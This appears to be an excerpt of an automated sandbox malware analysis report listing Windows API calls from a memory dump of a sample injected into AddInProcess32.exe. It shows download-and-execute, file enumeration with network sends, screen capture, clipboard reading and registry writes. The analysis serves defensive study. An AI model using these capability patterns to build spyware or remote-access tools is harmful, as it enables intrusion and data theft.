                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadExecuteFileShell
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
                                                  • API String ID: 2825088817-2881483049
                                                  • Opcode ID: 9f5b968c6e4d13a32f439f0c593d86c68188ffb5f86be7ef69c41037581f8e10
                                                  • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                  • Opcode Fuzzy Hash: 9f5b968c6e4d13a32f439f0c593d86c68188ffb5f86be7ef69c41037581f8e10
                                                  • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$FirstNextsend
                                                  • String ID: XPG$XPG
                                                  • API String ID: 4113138495-1962359302
                                                  • Opcode ID: cdd7df9d276d42dba91526b427dd22836cd6c2a9b532d5e4c10447e9b5e49680
                                                  • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                  • Opcode Fuzzy Hash: cdd7df9d276d42dba91526b427dd22836cd6c2a9b532d5e4c10447e9b5e49680
                                                  • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                    • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                    • Part of subcall function 004137AA: RegSetValueExA.KERNELBASE(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.2 Pro), ref: 004137E1
                                                    • Part of subcall function 004137AA: RegCloseKey.KERNELBASE(?,?,?,0040F88E,004674C8,5.1.2 Pro), ref: 004137EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                  • API String ID: 4127273184-3576401099
                                                  • Opcode ID: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
                                                  • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                  • Opcode Fuzzy Hash: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
                                                  • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                  • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                  • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                  • String ID:
                                                  • API String ID: 4212172061-0
                                                  • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                  • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                  • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                  • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: p'E$JD
                                                  • API String ID: 1084509184-908320845
                                                  • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                  • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                  • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                  • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                  • String ID:
                                                  • API String ID: 2829624132-0
                                                  • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                  • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                  • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                  • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                  • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                  • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                  • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                  APIs
                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00000000), ref: 004338DA
                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                  • String ID:
                                                  • API String ID: 1815803762-0
                                                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                  • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                  • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                  • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                  • ExitProcess.KERNEL32 ref: 0044338F
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                  • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                  • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                  • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                  APIs
                                                  • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                  • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                  • CloseClipboard.USER32 ref: 0040B760
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$CloseDataOpen
                                                  • String ID:
                                                  • API String ID: 2058664381-0
                                                  • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                  • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                  • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                  • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .
                                                  • API String ID: 0-248832578
                                                  • Opcode ID: dab0a497b08e8df346a97c8899a5e14908918034842a488b938a10d87d6eec82
                                                  • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                  • Opcode Fuzzy Hash: dab0a497b08e8df346a97c8899a5e14908918034842a488b938a10d87d6eec82
                                                  • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: JD
                                                  • API String ID: 1084509184-2669065882
                                                  • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                  • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                  • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                  • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: GetLocaleInfoEx
                                                  • API String ID: 2299586839-2904428671
                                                  • Opcode ID: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                  • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                  • Opcode Fuzzy Hash: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                  • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$FreeProcess
                                                  • String ID:
                                                  • API String ID: 3859560861-0
                                                  • Opcode ID: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                  • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                                  • Opcode Fuzzy Hash: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                  • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor
                                                  • String ID:
                                                  • API String ID: 2325560087-0
                                                  • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                  • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                  • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                  • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                  • String ID:
                                                  • API String ID: 1663032902-0
                                                  • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                  • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                  • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                  • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                  • String ID:
                                                  • API String ID: 2692324296-0
                                                  • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                  • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                  • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                  • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                  APIs
                                                    • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                  • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                  • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                  • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                  • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID:
                                                  • API String ID: 1084509184-0
                                                  • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                  • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                  • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                  • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                  • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                  • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                  • Instruction Fuzzy Hash:
                                                  APIs
                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                    • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                  • DeleteDC.GDI32(00000000), ref: 00418F65
                                                  • DeleteDC.GDI32(00000000), ref: 00418F68
                                                  • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                  • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                  • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                  • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                  • DeleteObject.GDI32(?), ref: 00419027
                                                  • DeleteObject.GDI32(?), ref: 00419034
                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                  • DeleteDC.GDI32(?), ref: 004191B7
                                                  • DeleteDC.GDI32(00000000), ref: 004191BA
                                                  • DeleteObject.GDI32(00000000), ref: 004191BD
                                                  • GlobalFree.KERNEL32(?), ref: 004191C8
                                                  • DeleteObject.GDI32(00000000), ref: 0041927C
                                                  • GlobalFree.KERNEL32(?), ref: 00419283
                                                  • DeleteDC.GDI32(?), ref: 00419293
                                                  • DeleteDC.GDI32(00000000), ref: 0041929E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                  • String ID: DISPLAY
                                                  • API String ID: 479521175-865373369
                                                  • Opcode ID: 7c8983c53be72e5ee4313047db9d93c3c673d7ce03baff72bd223da92b172140
                                                  • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                  • Opcode Fuzzy Hash: 7c8983c53be72e5ee4313047db9d93c3c673d7ce03baff72bd223da92b172140
                                                  • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418174
